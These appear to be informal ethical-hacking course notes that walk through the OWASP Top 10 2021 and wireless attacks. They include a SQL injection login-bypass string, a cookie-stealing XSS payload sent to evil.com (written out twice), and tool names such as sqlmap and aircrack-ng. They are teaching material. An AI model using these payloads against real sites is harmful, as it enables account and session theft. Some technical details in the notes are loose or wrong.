Hacking Web Applications
SQL Injection
Hacking Wireless Networks
Hacking Mobile Platforms


Tools - zaproxy, Checkmarx, synk, accnitex

=====================================================

https://owasp.org/www-project-top-ten/
https://owasp.org/www-project-top-ten/assets/images/mapping.png

A01:2021-Broken Access Control 

RBAC - Role Based Access Control 
MAC - Mandatory Access Control 

Privilege Escalation - Admin Control 

========================================================
A2 :- Cryptographic Failures 

1. Weak Encryption Alog
2. Lack of Encryption 

MITM , Session Hijacking , arpspoof
Encryption Decryption 
HTTPS , SSH 
==============================================
A3 :- Injection
What all places we give inputs to Website

Malicious Inputs , Malicious Code, Commads 
User Name/Password
Comments 
Search Bar 
Form Fill

SQL Injection 
Cross Site Scripting 
Command Injection 

SQL Injection :- 
Gain Access to DB/SQL Server

SELECT * from FB_LOGIN_DATA where Username=admin' or '1'='1 && PWD=admin' or '1'='1

Truth Table

T && T = T
T && F = F
F && T = F
F && F = F

Username == !#$%^&*()_+<>?:"{}
SQL injection

Sqlmap 

1. Content Filtering 
2. Whitelist 
3. WAF Web Applcation Firewall 

====
Cross site Scripting :- 
Input :- <script>alert('Welcome to simplilearn')</script>
Output :- Welcome to simplilearn

Malicious Scripts 
VB Script, Java Script, CSS , Flash 

Stored XSS :- Script is going to save in the Website DB 
2020 - OLX Under Post XSS SCript 
 <script>window.location="http://evil.com/?cookie=" + document.cookie</script>

Reflected XSS :- Execute in Victims. Script is Only Executed of user / Script is not going to Save 

<script>window.location="http://evil.com/?cookie=" + document.cookie</script>

Run Envi. 

1. Content Filtering 
2. Whitelist - ! # $
3. WAF Web Applcation Firewall .

Command Injection :- 

ifconfig
ipconfig
netstat
nslookup
nmap
ping

CMD 
Terminal 

================================
A4-Insecure Design :-

Design of Site 
Arch 
SDLC -->  SSDLC 

Arch. 
Threat Modeling 
https://learn.microsoft.com/en-us/azure/security/develop/threat-modeling-tool-getting-started.

Ports, API, 3rd Modules, Conf, Protocols

=============================================
A05:2021-Security Misconfiguration 

1. Default Credentials 
2. Unnecessary Services - 21,22,23,25,3389,1433 
- 80,443 
3. Improper Error Handling 

Apache/2.4.52 (Ubuntu) Server at pld.cs.luc.edu Port 443
4. Open Access Controls 

Least Privileges - MAC RBAC

===================================
A06:2021-Vulnerable and Outdated Components


EOL/EOS 
Windows 2007 and XP -- Risk Acceptance 
win 10,11
Cobalt 

========================
A07:2021-Identification and Authentication Failures
Password Cracking on Webapplication

-- 12 A-Z,a-z,!@#$%^&*()12345678
-- 2FA

==================================
A08:2021-Software and Data Integrity Failures

Hashing, Digital Signatures 

CEH Fees :- 3391ad6e1cc8c157568236ca9aee796748ec63881de4186cadd618a8fcba681f
CEH Fees :- dac6a7381c81c02fb8f9b3720b98e88e4248f870a80e6249218995673c5faaca
Hash clac, Command 
===============
A09:2021-Security Logging and Monitoring Failures
24/7 365
SOC 
clearev

===============================
A10:2021-Server-Side Request Forgery
Remote Resources 
FTP, SSH, RDP, Local 
123.23.1.12


======================================================================
Wireless Hacking - 

WIFI
Bluetooth
NFC
GSM

IEEE - Instuite of Electrical and Electronic Engineers standards 

WIFI  WIRELESS FIDELITY - 802.11a

WIFI 
WEP - wire equivalent privacy
WPA - Wifi Protected Access 
WPA2 - WIFI protected Access - AES128
WPA3 - WIFI Protected Access - SHA384

airmon-ng, airodump-ng, aircrack-ng











 